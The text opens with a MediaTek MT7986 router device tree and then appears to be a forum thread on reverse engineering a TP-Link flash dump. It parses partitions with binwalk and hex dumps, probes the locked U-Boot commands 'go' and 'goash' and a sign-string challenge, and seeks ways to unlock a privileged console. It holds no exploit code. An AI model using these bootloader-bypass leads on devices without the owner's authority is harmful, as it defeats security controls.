		interrupts = <0x00 0x74 0x04 0x00 0x75 0x04 0x00 0x76 0x04 0x00 0x77 0x04>;
		interrupt-names = "ring0\0ring1\0ring2\0ring3";
		clocks = <0x04 0x0f>;
		clock-names = "infra_eip97_ck";
		assigned-clocks = <0x05 0x50>;
		assigned-clock-parents = <0x05 0x15>;
	};

	pinctrl@1001f000 {
		compatible = "mediatek,mt7986-pinctrl";
		reg = <0x00 0x1001f000 0x00 0x1000 0x00 0x11c30000 0x00 0x1000 0x00 0x11c40000 0x00 0x1000 0x00 0x11e20000 0x00 0x1000 0x00 0x11e30000 0x00 0x1000 0x00 0x11f00000 0x00 0x1000 0x00 0x11f10000 0x00 0x1000 0x00 0x1000b000 0x00 0x1000>;
		reg-names = "gpio_base\0iocfg_rt_base\0iocfg_rb_base\0iocfg_lt_base\0iocfg_lb_base\0iocfg_tr_base\0iocfg_tl_base\0eint";
		gpio-controller;
		#gpio-cells = <0x02>;
		gpio-ranges = <0x11 0x00 0x00 0x64>;
		interrupt-controller;
		interrupts = <0x00 0xe1 0x04>;
		interrupt-parent = <0x01>;
		#interrupt-cells = <0x02>;
		phandle = <0x11>;

		wifi_led-pins-1-2 {

			mux {
				function = "led";
				groups = "wifi_led";
			};
		};

		i2c-pins-3-4 {
			phandle = <0x0a>;

			mux {
				function = "i2c";
				groups = "i2c";
			};
		};

		uart1-pins-7-to-10 {

			mux {
				function = "uart";
				groups = "uart1_0";
			};
		};

		pcie0-pins-9-10-41 {
			phandle = <0x10>;

			mux {
				function = "pcie";
				groups = "pcie_clk\0pcie_wake\0pcie_pereset";
			};
		};

		jtag-pins-11-to-14 {

			mux {
				function = "jtag";
				groups = "jtag";
			};
		};

		spic-pins-11-to-14 {

			mux {
				function = "spi";
				groups = "spi1_0";
			};
		};

		pwm1-pin-20 {

			mux {
				function = "pwm";
				groups = "pwm1_1";
			};
		};

		pwm0-pin-21 {
			phandle = <0x06>;

			mux {
				function = "pwm";
				groups = "pwm0";
			};
		};

		pwm1-pin-22 {
			phandle = <0x07>;

			mux {
				function = "pwm";
				groups = "pwm1_0";
			};
		};

		spic-pins-23-to-26 {

			mux {
				function = "spi";
				groups = "spi1_1";
			};
		};

		uart1-pins-23-to-26 {

			mux {
				function = "uart";
				groups = "uart1_1";
			};
		};

		spic-pins-29-to-32 {
			phandle = <0x1c>;

			mux {
				function = "spi";
				groups = "spi1_2";
			};
		};

		uart1-pins-29-to-32 {

			mux {
				function = "uart";
				groups = "uart1_2";
			};
		};

		uart1-pins-23-to-36 {

			mux {
				function = "uart";
				groups = "uart2_1";
			};
		};

		spic-pins-33-to-36 {

			mux {
				function = "spi";
				groups = "spi1_3";
			};
		};

		uart1-pins-35-to-38 {

			mux {
				function = "uart";
				groups = "uart1_3_rx_tx\0uart1_3_cts_rts";
			};
		};

		uart1-pins-42-to-45 {
			phandle = <0x08>;

			mux {
				function = "uart";
				groups = "uart1";
			};
		};

		uart1-pins-46-to-49 {
			phandle = <0x09>;

			mux {
				function = "uart";
				groups = "uart2";
			};
		};

		pcm-pins-62-to-65 {

			mux {
				function = "pcm";
				groups = "pcm";
			};
		};

		spi-flash-pins-33-to-38 {
			phandle = <0x1b>;

			mux {
				function = "flash";
				groups = "spi0\0spi0_wp_hold";
			};

			conf-pu {
				pins = "SPI2_CS\0SPI2_HOLD\0SPI2_WP";
				drive-strength = <0x08>;
				mediatek,pull-up-adv = <0x00>;
			};

			conf-pd {
				pins = "SPI2_CLK\0SPI2_MOSI\0SPI2_MISO";
				drive-strength = <0x08>;
				mediatek,pull-down-adv = <0x00>;
			};
		};

		wf_2g_5g-pins {
			phandle = <0x19>;

			mux {
				function = "wifi";
				groups = "wf_2g\0wf_5g";
			};

			conf {
				pins = "WF0_HB1\0WF0_HB2\0WF0_HB3\0WF0_HB4\0WF0_HB0\0WF0_HB0_B\0WF0_HB5\0WF0_HB6\0WF0_HB7\0WF0_HB8\0WF0_HB9\0WF0_HB10\0WF0_TOP_CLK\0WF0_TOP_DATA\0WF1_HB1\0WF1_HB2\0WF1_HB3\0WF1_HB4\0WF1_HB0\0WF1_HB5\0WF1_HB6\0WF1_HB7\0WF1_HB8\0WF1_TOP_CLK\0WF1_TOP_DATA";
				drive-strength = <0x04>;
			};
		};

		wf_dbdc-pins {
			phandle = <0x1a>;

			mux {
				function = "wifi";
				groups = "wf_dbdc";
			};

			conf {
				pins = "WF0_HB1\0WF0_HB2\0WF0_HB3\0WF0_HB4\0WF0_HB0\0WF0_HB0_B\0WF0_HB5\0WF0_HB6\0WF0_HB7\0WF0_HB8\0WF0_HB9\0WF0_HB10\0WF0_TOP_CLK\0WF0_TOP_DATA\0WF1_HB1\0WF1_HB2\0WF1_HB3\0WF1_HB4\0WF1_HB0\0WF1_HB5\0WF1_HB6\0WF1_HB7\0WF1_HB8\0WF1_TOP_CLK\0WF1_TOP_DATA";
				drive-strength = <0x04>;
			};
		};
	};

	syscon@15000000 {
		#address-cells = <0x01>;
		#size-cells = <0x01>;
		compatible = "mediatek,mt7986-ethsys_ck\0syscon";
		reg = <0x00 0x15000000 0x00 0x1000>;
		#clock-cells = <0x01>;
		#reset-cells = <0x01>;
		phandle = <0x12>;

		reset-controller {
			compatible = "ti,syscon-reset";
			#reset-cells = <0x01>;
			ti,reset-bits = <0x34 0x04 0x34 0x04 0x34 0x04 0x28>;
			phandle = <0x02>;
		};
	};

	ethernet@15100000 {
		compatible = "mediatek,mt7986-eth";
		reg = <0x00 0x15100000 0x00 0x80000>;
		interrupts = <0x00 0xc4 0x04 0x00 0xc5 0x04 0x00 0xc6 0x04 0x00 0xc7 0x04>;
		clocks = <0x12 0x00 0x12 0x01 0x12 0x02 0x12 0x03 0x12 0x04 0x13 0x00 0x13 0x01 0x13 0x02 0x13 0x03 0x14 0x00 0x14 0x01 0x14 0x02 0x14 0x03>;
		clock-names = "fe\0gp2\0gp1\0wocpu1\0wocpu0\0sgmii_tx250m\0sgmii_rx250m\0sgmii_cdr_ref\0sgmii_cdr_fb\0sgmii2_tx250m\0sgmii2_rx250m\0sgmii2_cdr_ref\0sgmii2_cdr_fb";
		assigned-clocks = <0x05 0x4b 0x05 0x4c>;
		assigned-clock-parents = <0x05 0x15 0x05 0x1b>;
		mediatek,ethsys = <0x12>;
		mediatek,sgmiisys = <0x13 0x14>;
		#reset-cells = <0x01>;
		#address-cells = <0x01>;
		#size-cells = <0x00>;
		status = "okay";

		mac@0 {
			compatible = "mediatek,eth-mac";
			reg = <0x00>;
			phy-mode = "2500base-x";
			phandle = <0x15>;

			fixed-link {
				speed = <0x9c4>;
				full-duplex;
				pause;
			};
		};

		mac@1 {
			compatible = "mediatek,eth-mac";
			reg = <0x01>;
			phy-mode = "2500base-x";

			fixed-link {
				speed = <0x9c4>;
				full-duplex;
				pause;
			};
		};

		mdio-bus {
			#address-cells = <0x01>;
			#size-cells = <0x00>;
			phandle = <0x26>;

			phy@5 {
				compatible = "ethernet-phy-id67c9.de0a";
				reg = <0x05>;
				reset-gpios = <0x11 0x06 0x01>;
				reset-deassert-us = <0x4e20>;
				phy-mode = "2500base-x";
			};

			phy@6 {
				compatible = "ethernet-phy-id67c9.de0a";
				reg = <0x06>;
				phy-mode = "2500base-x";
			};

			switch@0 {
				compatible = "mediatek,mt7531";
				reg = <0x1f>;
				reset-gpios = <0x11 0x05 0x00>;

				ports {
					#address-cells = <0x01>;
					#size-cells = <0x00>;

					port@0 {
						reg = <0x00>;
						label = "lan0";
					};

					port@1 {
						reg = <0x01>;
						label = "lan1";
					};

					port@2 {
						reg = <0x02>;
						label = "lan2";
					};

					port@3 {
						reg = <0x03>;
						label = "lan3";
					};

					port@6 {
						reg = <0x06>;
						label = "cpu";
						ethernet = <0x15>;
						phy-mode = "2500base-x";

						fixed-link {
							speed = <0x9c4>;
							full-duplex;
							pause;
						};
					};
				};
			};
		};
	};

	hnat@15000000 {
		compatible = "mediatek,mtk-hnat_v4";
		reg = <0x00 0x15100000 0x00 0x80000>;
		resets = <0x12 0x00>;
		reset-names = "mtketh";
		status = "okay";
		mtketh-wan = "eth1";
		mtketh-lan = "lan";
		mtketh-max-gmac = <0x02>;
	};

	syscon@10060000 {
		compatible = "mediatek,mt7986-sgmiisys\0mediatek,mt7986-sgmiisys_0\0syscon";
		reg = <0x00 0x10060000 0x00 0x1000>;
		#clock-cells = <0x01>;
		phandle = <0x13>;
	};

	syscon@10070000 {
		compatible = "mediatek,mt7986-sgmiisys\0mediatek,mt7986-sgmiisys_1\0syscon";
		reg = <0x00 0x10070000 0x00 0x1000>;
		#clock-cells = <0x01>;
		phandle = <0x14>;
	};

	snfi@11005000 {
		compatible = "mediatek,mt7986-snand";
		reg = <0x00 0x11005000 0x00 0x1000 0x00 0x11006000 0x00 0x1000>;
		reg-names = "nfi\0ecc";
		interrupts = <0x00 0x79 0x04>;
		clocks = <0x04 0x20 0x04 0x1f 0x04 0x21>;
		clock-names = "pad_clk\0nfi_clk\0nfi_hclk";
		assigned-clocks = <0x05 0x38 0x05 0x37>;
		assigned-clock-parents = <0x05 0x04 0x05 0x04>;
		#address-cells = <0x01>;
		#size-cells = <0x00>;
		status = "disabled";
	};

	wbsys@18000000 {
		compatible = "mediatek,wbsys";
		resets = <0x16 0x17>;
		reset-names = "consys";
		reg = <0x00 0x18000000 0x00 0x1000000 0x00 0x10003000 0x00 0x1000 0x00 0x11d1000 0x00 0x1000>;
		interrupts = <0x00 0xd5 0x04 0x00 0xd6 0x04 0x00 0xd7 0x04 0x00 0xd8 0x04>;
		chip_id = <0x7986>;
		memory-region = <0x17>;
		mediatek,mtd-eeprom = <0x18 0x00>;
		status = "okay";
		pinctrl-names = "default\0dbdc";
		pinctrl-0 = <0x19>;
		pinctrl-1 = <0x1a>;
	};

	wed_pcie@10003000 {
		compatible = "mediatek,wed_pcie";
		reg = <0x00 0x10003000 0x00 0x10>;
	};

	spi@1100a000 {
		compatible = "mediatek,ipm-spi-quad";
		reg = <0x00 0x1100a000 0x00 0x100>;
		interrupts = <0x00 0x8c 0x04>;
		clocks = <0x05 0x02 0x05 0x39 0x04 0x22 0x04 0x24>;
		clock-names = "parent-clk\0sel-clk\0spi-clk\0spi-hclk";
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x1b>;
		cs-gpios = <0x00 0x00>;

		spi_nor@0 {
			#address-cells = <0x01>;
			#size-cells = <0x01>;
			compatible = "jedec,spi-nor";
			reg = <0x00>;
			spi-max-frequency = <0x3197500>;
			spi-tx-buswidth = <0x04>;
			spi-rx-buswidth = <0x04>;
		};

		spi_nand@1 {
			#address-cells = <0x01>;
			#size-cells = <0x01>;
			compatible = "spi-nand";
			reg = <0x01>;
			spi-max-frequency = <0x2625a00>;
			spi-tx-buswidth = <0x04>;
			spi-rx-buswidth = <0x04>;
			phandle = <0x22>;
		};
	};

	spi@1100b000 {
		compatible = "mediatek,ipm-spi-single";
		reg = <0x00 0x1100b000 0x00 0x100>;
		interrupts = <0x00 0x8d 0x04>;
		clocks = <0x05 0x02 0x05 0x3a 0x04 0x23 0x04 0x25>;
		clock-names = "parent-clk\0sel-clk\0spi-clk\0spi-hclk";
		status = "okay";
		pinctrl-names = "default";
		pinctrl-0 = <0x1c>;

		proslic_spi@0 {
			compatible = "silabs,proslic_spi";
			reg = <0x00>;
			spi-max-frequency = <0x989680>;
			spi-cpha = <0x01>;
			spi-cpol = <0x01>;
			channel_count = <0x01>;
			debug_level = <0x04>;
			reset_gpio = <0x11 0x07 0x00>;
			ig,enable-spi = <0x01>;
			phandle = <0x25>;
		};
	};

	mmc@11230000 {
		compatible = "mediatek,mt7986-mmc";
		reg = <0x00 0x11230000 0x00 0x1000 0x00 0x11c20000 0x00 0x1000>;
		interrupts = <0x00 0x8f 0x04>;
		clocks = <0x05 0x28 0x05 0x27 0x04 0x27>;
		clock-names = "source\0hclk\0source_cg";
		assigned-clocks = <0x05 0x40 0x05 0x3f>;
		assigned-clock-parents = <0x05 0x01 0x05 0x11>;
		status = "disabled";
	};

	adc@1100d000 {
		compatible = "mediatek,mt7986-auxadc\0mediatek,mt7622-auxadc";
		reg = <0x00 0x1100d000 0x00 0x1000>;
		clocks = <0x04 0x2b 0x04 0x2c>;
		clock-names = "main\032k";
		#io-channel-cells = <0x01>;
		status = "okay";
		phandle = <0x0c>;
	};

	consys@10000000 {
		compatible = "mediatek,mt7986-consys";
		reg = <0x00 0x10000000 0x00 0x8600000>;
		memory-region = <0x17>;
	};

	xhci@11200000 {
		compatible = "mediatek,mt7986-xhci\0mediatek,mtk-xhci";
		reg = <0x00 0x11200000 0x00 0x2e00 0x00 0x11203e00 0x00 0x100>;
		reg-names = "mac\0ippc";
		interrupts = <0x00 0xad 0x04>;
		phys = <0x1d 0x03 0x1e 0x04 0x1f 0x03>;
		clocks = <0x20 0x20 0x20 0x20 0x20>;
		clock-names = "sys_ck\0xhci_ck\0ref_ck\0mcu_ck\0dma_ck";
		#address-cells = <0x02>;
		#size-cells = <0x02>;
		status = "okay";
		usb-power-ctrl-gpios = <0x11 0x0e 0x00>;
	};

	usb-phy@11e10000 {
		compatible = "mediatek,mt7986\0mediatek,generic-tphy-v2";
		#address-cells = <0x02>;
		#size-cells = <0x02>;
		ranges;
		status = "okay";

		usb-phy@11e10000 {
			reg = <0x00 0x11e10000 0x00 0x700>;
			clocks = <0x20>;
			clock-names = "ref";
			#phy-cells = <0x01>;
			status = "okay";
			phandle = <0x1d>;
		};

		usb-phy@11e10700 {
			reg = <0x00 0x11e10700 0x00 0x900>;
			clocks = <0x20>;
			clock-names = "ref";
			#phy-cells = <0x01>;
			status = "okay";
			phandle = <0x1e>;
		};

		usb-phy@11e11000 {
			reg = <0x00 0x11e11000 0x00 0x700>;
			clocks = <0x20>;
			clock-names = "ref";
			#phy-cells = <0x01>;
			status = "okay";
			phandle = <0x1f>;
		};
	};

	clkitg {
		compatible = "simple-bus";

		bring-up {
			compatible = "mediatek,clk-bring-up";
			clocks = <0x0d 0x00 0x0d 0x01 0x0d 0x02 0x0d 0x03 0x0d 0x04 0x0d 0x05 0x0d 0x06 0x0d 0x07 0x03 0x00 0x03 0x01 0x21 0x03 0x03 0x21 0x03 0x05 0x03 0x06 0x03 0x07 0x21 0x03 0x09 0x03 0x0a 0x03 0x0b 0x03 0x0c 0x03 0x0d 0x03 0x0e 0x03 0x0f 0x03 0x10 0x03 0x11 0x03 0x12 0x03 0x13 0x03 0x14 0x03 0x15 0x03 0x16 0x03 0x17 0x21 0x21 0x03 0x1a 0x03 0x1b 0x03 0x1c 0x03 0x1d 0x03 0x1e 0x03 0x1f 0x03 0x20 0x03 0x21 0x21 0x03 0x23 0x04 0x00 0x04 0x01 0x04 0x02 0x21 0x21 0x04 0x05 0x04 0x06 0x04 0x07 0x21 0x21 0x04 0x0a 0x04 0x0b 0x04 0x0c 0x04 0x0d 0x04 0x0e 0x21 0x21 0x21 0x21 0x21 0x21 0x04 0x15 0x21 0x04 0x17 0x04 0x18 0x04 0x19 0x21 0x04 0x1b 0x04 0x1c 0x04 0x1d 0x04 0x1e 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x04 0x26 0x04 0x27 0x04 0x28 0x04 0x29 0x04 0x2a 0x21 0x21 0x04 0x2d 0x04 0x2e 0x04 0x2f 0x04 0x30 0x04 0x31 0x21 0x21 0x21 0x21 0x05 0x01 0x21 0x05 0x03 0x05 0x04 0x05 0x05 0x05 0x06 0x05 0x07 0x05 0x08 0x05 0x09 0x05 0x0a 0x05 0x0b 0x05 0x0c 0x05 0x0d 0x05 0x0e 0x05 0x0f 0x05 0x10 0x05 0x11 0x05 0x12 0x05 0x13 0x05 0x14 0x05 0x15 0x05 0x16 0x05 0x17 0x05 0x18 0x05 0x19 0x05 0x1a 0x05 0x1b 0x05 0x1c 0x05 0x1d 0x05 0x1e 0x05 0x1f 0x05 0x20 0x05 0x21 0x05 0x22 0x05 0x23 0x05 0x24 0x05 0x25 0x05 0x26 0x05 0x27 0x05 0x28 0x05 0x29 0x05 0x2a 0x05 0x2b 0x05 0x2c 0x05 0x2d 0x05 0x2e 0x05 0x2f 0x05 0x30 0x05 0x31 0x05 0x32 0x05 0x33 0x05 0x34 0x05 0x35 0x05 0x36 0x05 0x37 0x05 0x38 0x21 0x21 0x05 0x3b 0x05 0x3c 0x05 0x3d 0x05 0x3e 0x05 0x3f 0x05 0x40 0x05 0x41 0x05 0x42 0x05 0x43 0x05 0x44 0x05 0x45 0x05 0x46 0x21 0x05 0x48 0x05 0x49 0x05 0x4a 0x05 0x4b 0x05 0x4c 0x05 0x4d 0x21 0x05 0x4f 0x21 0x05 0x51 0x05 0x52 0x05 0x53 0x21 0x21 0x05 0x56 0x05 0x57 0x05 0x58 0x05 0x59 0x05 0x5a 0x05 0x5b 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21 0x21>;
			clock-names = "0\01\02\03\04\05\06\07\08\09\010\011\012\013\014\015\016\017\018\019\020\021\022\023\024\025\026\027\028\029\030\031\032\033\034\035\036\037\038\039\040\041\042\043\044\045\046\047\048\049\050\051\052\053\054\055\056\057\058\059\060\061\062\063\064\065\066\067\068\069\070\071\072\073\074\075\076\077\078\079\080\081\082\083\084\085\086\087\088\089\090\091\092\093\094\095\096\097\098\099\0100\0101\0102\0103\0104\0105\0106\0107\0108\0109\0110\0111\0112\0113\0114\0115\0116\0117\0118\0119\0120\0121\0122\0123\0124\0125\0126\0127\0128\0129\0130\0131\0132\0133\0134\0135\0136\0137\0138\0139\0140\0141\0142\0143\0144\0145\0146\0147\0148\0149\0150\0151\0152\0153\0154\0155\0156\0157\0158\0159\0160\0161\0162\0163\0164\0165\0166\0167\0168\0169\0170\0171\0172\0173\0174\0175\0176\0177\0178\0179\0180\0181\0182\0183\0184\0185\0186\0187\0188\0189\0190\0191\0192\0193\0194\0195\0196\0197\0198\0199\0200\0201\0202\0203\0204\0205\0206\0207\0208\0209\0210\0211\0212\0213\0214\0215\0216\0217\0218\0219\0220\0221";
		};
	};

	audio-controller@11210000 {
		compatible = "mediatek,mt79xx-audio";
		reg = <0x00 0x11210000 0x00 0x9000>;
		interrupts = <0x00 0x6a 0x04>;
		clocks = <0x04 0x10 0x04 0x11 0x04 0x12 0x04 0x13 0x04 0x14>;
		clock-names = "aud_bus_ck\0aud_26m_ck\0aud_l_ck\0aud_aud_ck\0aud_eg2_ck";
		assigned-clocks = <0x05 0x4e 0x05 0x54 0x05 0x55>;
		assigned-clock-parents = <0x05 0x0e 0x05 0x0d 0x05 0x0e>;
		phandle = <0x23>;
	};

	trng@1020f000 {
		compatible = "mediatek,mt7986-rng\0mediatek,mt7623-rng";
		reg = <0x00 0x1020f000 0x00 0x100>;
		clocks = <0x04 0x36>;
		clock-names = "rng";
	};

	ice_debug {
		compatible = "mediatek,mt7986-ice_debug\0mediatek,mt2701-ice_debug";
		clocks = <0x04 0x16 0x05 0x47>;
		clock-names = "ice_dbg\0dbg_jtsel";
	};

	efuse@11d00000 {
		compatible = "mediatek,mt7986-efuse\0mediatek,efuse";
		reg = <0x00 0x11d00000 0x00 0x1000>;
		#address-cells = <0x01>;
		#size-cells = <0x01>;

		calib@274 {
			reg = <0x274 0x0c>;
			phandle = <0x0e>;
		};
	};

	nmbm_spim_nand {
		compatible = "generic,nmbm";
		#address-cells = <0x01>;
		#size-cells = <0x01>;
		lower-mtd-device = <0x22>;
		forced-create;

		partitions {
			compatible = "fixed-partitions";
			#address-cells = <0x01>;
			#size-cells = <0x01>;

			partition@0 {
				label = "BL2";
				reg = <0x00 0x100000>;
				read-only;
			};

			partition@100000 {
				label = "u-boot-env";
				reg = <0x100000 0x80000>;
			};

			partition@180000 {
				label = "Factory";
				reg = <0x180000 0x200000>;
				phandle = <0x18>;
			};

			partition@380000 {
				label = "FIP";
				reg = <0x380000 0x200000>;
			};

			partition@580000 {
				label = "ubi";
				reg = <0x580000 0x4000000>;
			};
		};
	};

	chosen {
		bootargs = "console=ttyS0,115200n1 loglevel=8  \t\t\t\tearlycon=uart8250,mmio32,0x11002000";
	};

	memory {
		reg = <0x00 0x40000000 0x00 0x10000000>;
	};

	sound_wm8960 {
		compatible = "mediatek,mt79xx-wm8960-machine";
		mediatek,platform = <0x23>;
		audio-routing = "Headphone\0HP_L\0Headphone\0HP_R\0LINPUT1\0AMIC\0RINPUT1\0AMIC";
		mediatek,audio-codec = <0x24>;
		status = "okay";
	};

	sound_si3218x {
		compatible = "mediatek,mt79xx-si3218x-machine";
		mediatek,platform = <0x23>;
		mediatek,ext-codec = <0x25>;
		status = "okay";
	};

	gsw@0 {
		compatible = "mediatek,mt753x";
		mediatek,ethsys = <0x12>;
		#address-cells = <0x01>;
		#size-cells = <0x00>;
		mediatek,mdio = <0x26>;
		mediatek,mdio_master_pinmux = <0x00>;
		reset-gpios = <0x11 0x05 0x00>;
		status = "okay";

		port@5 {
			compatible = "mediatek,mt753x-port";
			reg = <0x05>;
			phy-mode = "sgmii";

			fixed-link {
				speed = <0x9c4>;
				full-duplex;
			};
		};

		port@6 {
			compatible = "mediatek,mt753x-port";
			reg = <0x06>;
			phy-mode = "sgmii";

			fixed-link {
				speed = <0x9c4>;
				full-duplex;
			};
		};
	};

	rtk-8226b {
		compatible = "realtek,rtk-8226b-phy";
		status = "ok";
		switch-reset-gpio = <0x11 0x0d 0x00>;
		cpu-reset-gpio = <0x11 0x11 0x00>;
	};
};

Heard back from TP-Link GPL and they're refusing to give me the source code so here's a dump of the flash chip, link is good for a week.

Here's some details about this bin:

==== BL2 ====
0x800: 4D4D4D01 indicates that this is a MediaTek device, obviously. https://wiki.postmarketos.org/wiki/MediaTek
Here's the sequence:

4D4D4D01 38000000 46494C45 5F494E46 4F000000 01000000 01000201 000D2000 084B0100 08530100 00030000 20000000 00030000 01000000

Parsing this means:
Image Type: ARM-Bootloader
Storage Type: NAND Sequential Flash
Signature Type: PHASH
Load Address: 0x000D2000
Total File Size: 0x084B0100
Content offset in file: 0x00030000
Signature Length: 0x20000000
Jump Offset (same as content offset): 0x00030000
Ending: 0x01000000 (POST_BUILD_DONE)

...continuing...

0x20000: u-boot usb? some details https://github.com/3F/aml_s905_uboot
==== End BL2 ====

==== u-boot-env ====
0x100000: u-boot-env
==== End u-boot-env ====

==== Factory ====
seems to be excessive UBI erase count headers in here...

~0x304315: A bunch of Chinese domains? Followed by some config options.
0x3C0000: Unknown, magic bytes are 6D000080
==== End Factory ====

==== FIP ====
0x4C0000: Board info?

==== End FIP ====

==== UBI ====
0x520000: Kernel
0xC60000: squashfs filesystem
==== End UBI ====

Here's the binwalk:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
2056          0x808           Mediatek File Info File Type: ARM-Bootloader Flash Type: NAND Sequential Flash Signature Type: PHASH Load Address: 0x200D00 File Length: 84744 Maximum Size: 86792 Content Offset: 0x300 Signature Lenght: 32 Jump Offset: 768 POST_BUILD_DONE
12496         0x30D0          xz compressed data
12588         0x312C          xz compressed data
131208        0x20088         xz compressed data
145868        0x239CC         xz compressed data
1835008       0x1C0000        UBI erase count header, version: 1, EC: 0x9, VID header offset: 0x800, data offset: 0x1000
3932160       0x3C0000        LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 663072 bytes
5373952       0x520000        Flattened device tree, size: 4470444 bytes, version: 17
5374184       0x5200E8        LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 13387784 bytes
9821904       0x95DED0        Flattened device tree, size: 21160 bytes, version: 17
12976128      0xC60000        Squashfs filesystem, little endian, version 4.0, compression:xz, size: 35016105 bytes, 2007 inodes, blocksize: 262144 bytes, created: 2022-07-04 07:05:56

The goal here is to break out of the locked down U-Boot and/or unlock serial without writing back to the flash. Any suggestions? @Daniel usually has a trick or two :slight_smile:

UPDATE: so the u-boot header at 0x20000 actually is u-boot, and I believe it is encrypted to prevent us from toying with it.

Exhibit A: Binwalk shows generic xz compressed data:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
2056          0x808           Mediatek File Info File Type: ARM-Bootloader Flash Type: NAND Sequential Flash Signature Type: PHASH Load Address: 0x200D00 File Length: 84744 Maximum Size: 86792 Content Offset: 0x300 Signature Lenght: 32 Jump Offset: 768 POST_BUILD_DONE
12496         0x30D0          xz compressed data
12588         0x312C          xz compressed data
131208        0x20088         xz compressed data
145868        0x239CC         xz compressed data

Exhibit B: I opened the whole bin in a hex editor to figure out big said xz data is (283136 bytes) and dd'ed it out of the binary. Here's a binwalk entropy representation, nearly even at 1 across the entire bin.


Exhibit C: Running strings on the bin produces nothing tangible. TP-Link must have one of the previous stage boot loaders decrypting it.

Both BL2 and payloads of FIP are compressed by XZ. It's a feature provided by MediaTek for saving space on SPI-NOR flashes. No encryption at all.

This makes my life easier. Let me try to decompress...

Thank you!

Looks like I got u-boot extracted but having a hard time RE'ing it. Unsure if I broke something or didn't properly decompress it. At 0x20000 is

010064AA 78563412 00000000 00000000 47D4086D 4CFE9846 9B952950 CBBD5A00 88000000
00000000 44390000 00000000 00000000 00000000 D6D0EEA7 FCEAD54B 97829934 F234B6E4
CC390000 00000000 34180400 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00520400 00000000 00000000 00000000 00000000 00000000 FD377A58 5A000001
6922DE36 02002101 1C000000 10CF58CC E0906039 075D007A 00BC0A3F 5D99621C 9DB14425
779E6DCD 1CB9EC8B 88730D1F 259B29D0 C2873328 E7E0FC80 17B70C08 389E5B1B 576DDA05
D3716118 FA0CD4BF CEB4F0B1 8A1A3A43 6491FD21 F3057A3D EE4E3383 82AF3240 867BE398
1848B249 E6856CF9 577F48BC 65CE2958

0x010064AA is a u-boot usb header, then it looks like the compression starts at 0x20088 where the magic bytes are 0xFD377A58. So basically I dd'ed out 283000 bytes from there and assume it's u-boot. @hackpascal would I need to uncompress those 283000 bytes and then replace the xz compressed data in the binary?

Second, there's 2 interesting commands that are not blocked. 1: go:

MT7986> go                                                                      
go - start application at address 'addr'                                        
                                                                                
Usage:                                                                          
go addr [arg ...]                                                               
    - start application at address 'addr'                                       
      passing 'arg' as arguments 

2: goash:

MT7986> goash                                                                   
Reading from 0x100000 to 0x11ffff, size 0x20000 ...                             
Succeeded                                                                       
Reading from 0x4c0000 to 0x4dffff, size 0x20000 ...                             
Succeeded                                                                       
TP key selected.                                                                
  Sign   String:     PPPHLAAAAAAADIFIAADC                                       
                                                                                
  Please Input Sign Result:

Here's the contents of 0x10000:

4D314354 04940001 5ED84B15 8F42CF1C 2167686D 3777D2E4 00000006 F4848D6D 2C310001
00080000 00000000 00000002 00140000 03142996 D2B3E95F 8F82F07B 2EA62084 CD280003
00108BD7 3B43DD39 9F30DA6C FDBA8866 59F30004 00800000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000005 01003944 30414433 41393735 32324337 32393237 38344134 38423242
30363442 37354141 46443637 43304332 45434441 35363144 34464143 41394530 41343543
38303544 41443945 30374338 35353437 36384339 43383041 39434532 44394238 35343035
46313444 35443242 32413442 41434538 35343230 39374131 39383837 34353332 32373938
32393839 45413846 38333744 38304442 42443935 38454538 39343432 37344344 39433634
34364643 39373633 43394334 41373242 39374133 39303838 46303545 35394134 33333534
46333146 36444337 38394538 34373236 45464331 39444335 31304344 41423546 37424445
38393131 43384139 33443145 35380006 00C07B7D 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000007 02007B7D
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 0000FFFF...

and

00000100 55AA9DD1 A8C88331 C969FBBF BCF0D432 70C7AA55 44080000 44080000 00000000
00000009 00000000 000A0000 00100000 00020000 00160000 00020000 001C0000 00200000
003C0000 00040000 004C0000 00020000 00520000 00680000 00C60000 03800000 06A00000
01600000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
EFFA7474 B58EC62E 099ADC11 52366E0A 533BC3E2 F96BFDC1 177F6709 5C9614F5 A20FF1D5
1DAD490C 844C5769 DB0152E8 58445236 3038364D 54563100 00000002 6BAD15B2 6E7FF672
39D5E8F7 CE13E463 E70240CE AD016FD0 1E84DE9A 2DA17DAD FFFFFFFF ...

I'm thinking it expecting a key/cert to unlock a privileged console. Really just need to examine the u-boot binary here.

